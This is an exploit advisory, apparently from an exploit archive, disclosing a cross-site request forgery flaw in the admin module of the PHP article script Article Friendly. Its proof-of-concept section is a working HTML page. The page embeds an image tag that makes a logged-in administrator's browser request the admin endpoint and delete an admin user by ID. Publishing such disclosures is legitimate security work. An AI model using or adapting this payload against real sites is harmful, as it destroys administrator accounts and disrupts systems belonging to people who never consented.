Article Friendly - Cross-Site Request Forgery



EKU-ID: 18859 CVE: OSVDB-ID:
Author: pratul agrawal Published: 2010-02-24 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


                     =======================================================================

                                         Article friendly CSRF Vulnerability

                     =======================================================================

                                                     by

                                               Pratul Agrawal



  # Vulnerability found in- Admin module

  # email         Pratulag@yahoo.com

  # company       aksitservices

  # Credit by     Pratul Agrawal

  # Site p4ge     http://www.articlefriendly.com/

  # Plateform     php



  # Proof of concept   #

  Targeted URL:  http://server/admin/index.php?filename=adminlogin


  Script to delete the Admin user through Cross Site request forgery

             .  ..................................................................................................................

                        <html>

                          <body>

      <img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />

                          </body>

                        </html>


             .  ..................................................................................................................



  After execution refresh the page and u can see that user having giving ID  get deleted automatically.


#If you have any questions, comments, or concerns, feel free to contact me.